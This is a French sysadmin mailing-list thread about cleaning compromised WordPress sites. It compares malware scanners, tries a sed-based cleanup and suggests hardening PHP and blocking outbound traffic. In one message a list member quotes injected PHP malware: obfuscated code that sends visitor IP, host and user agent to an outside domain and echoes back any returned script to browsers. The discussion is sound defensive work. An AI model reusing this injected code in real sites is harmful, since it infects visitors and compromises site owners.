Fait déjà commencer par désactiver certaines fonctionnalités dangereuses dans php (disabled_functions dans php.ini)
Ensuite bloquer les requêtes http sortantes du serveur avec iptables. > Le 3 juin 2015 à 11:23, Pierre <pie...@infoserver4u.fr> a écrit : > > Hello, > > Je me permet de relancer la discutions car j'ai presque le même problème > avec un client. > > Sauf que le code change sur presque tout les fichiers. > > Voici un exemple de code : > > <?php > #568ba2# > error_reporting(0); @ini_set('display_errors',0); $wp_f67188 = > @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', > $wp_f67188) && !preg_match ('/bot/i', $wp_f67188))){^M > $wp_f0967188="http://"."theme"."header".".com/"."header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_f67188);^M > if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = > curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_f0967188); curl_setopt > ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);^M > $wp_67188f = curl_exec ($ch); curl_close($ch);} elseif > (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) > {$wp_67188f = @file_get_contents($wp_f0967188);}^M > elseif (function_exists('fopen') && > function_exists('stream_get_contents')) > {$wp_67188f=@stream_get_contents(@fopen($wp_f0967188, "r"));}}^M > if (substr($wp_67188f,1,3) === 'scr'){ echo $wp_67188f; } > #458ba2# > ?> > Ou encore > > <?php > #5a9312# > > > if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = > curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_f0967188); curl_setopt > ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);^M > $wp_67188f = curl_exec ($ch); curl_close($ch);} elseif > (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) > {$wp_67188f = @file_get_contents($wp_f0967188);}^M > elseif (function_exists('fopen') && > function_exists('stream_get_contents')) > {$wp_67188f=@stream_get_contents(@fopen($wp_f0967188, "r"));}}^M > if (substr($wp_67188f,1,3) === 'scr'){ echo $wp_67188f; } > #/5a9312# > ?> > > > J'ai essayé beaucoup de sed et xargs, mais le code est trop complexe > pour arrive a faire un truc propre. > > find . -type f -name "*.php" -print | xargs sed -i.hacked 's/^<?php n#*# > *?>//g' > > Le seul point commun est un début <?php saute de ligne puis un # et en > fin un autre # saute de ligne ?> > > J’essaie d'utiliser https://github.com/planet-work/php-malware-scanner > > Mais cela ne semble mal fonctionner avec mon problème. > > Auriez vous une idée ? > > Merci > > Pierre > > > Le 20/05/2015 16:09, Julien Escario a écrit : >> Le 20/05/2015 07:14, Jonathan Leroy a écrit : >>> J'ai eu une demande de "nettoyage" de sites WordPress ayant été hackés hier. >>> >>> J'en ai donc profité pour tester tous vos outils sur un des sites. >> >>> Le grand gagnant est php-malware-scanner de Frédéric, qui détecte deux >>> fichiers de plus que Sucuri (mais en laisse passer un autre). >>> J'ai mis un tableau comparatif en PJ pour ceux que ça intéresse :) >> >> Nice job ! >> >> Merci du retour. >> Julien >> >> >> >> _______________________________________________ >> Liste de diffusion du FRsAG >> http://www.frsag.org/ > > _______________________________________________ > Liste de diffusion du FRsAG > http://www.frsag.org/ _______________________________________________ Liste de diffusion du FRsAG http://www.frsag.org/